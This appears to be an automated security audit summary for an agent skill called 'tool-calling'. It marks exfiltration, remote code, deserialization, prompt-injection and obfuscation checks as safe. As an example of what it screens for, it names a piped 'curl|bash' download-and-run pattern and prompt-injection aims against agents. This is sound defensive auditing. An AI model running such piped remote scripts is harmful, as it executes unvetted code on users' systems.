tool-calling
Pass
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: LOW
Full Analysis
- [Data Exposure & Exfiltration] (SAFE): No hardcoded credentials, sensitive file paths, or unauthorized network operations were detected. The scripts only interact with the skill's own local configuration files.
- [Unverifiable Dependencies & Remote Code Execution] (SAFE): No remote code downloads (e.g., curl|bash) or execution of untrusted external scripts were found. The validation script uses standard libraries and the common PyYAML package.
- [Dynamic Execution] (SAFE): Both the validation script and the recommended design patterns correctly use
yaml.safe_load()for parsing configuration, which prevents unsafe deserialization attacks. - [Prompt Injection] (SAFE): No instructions attempting to override agent behavior, bypass safety filters, or extract system prompts were identified.
- [Obfuscation] (SAFE): All files consist of clear, human-readable text and code without any hidden layers, encoded payloads, or homoglyph-based evasion techniques.
Audit Metadata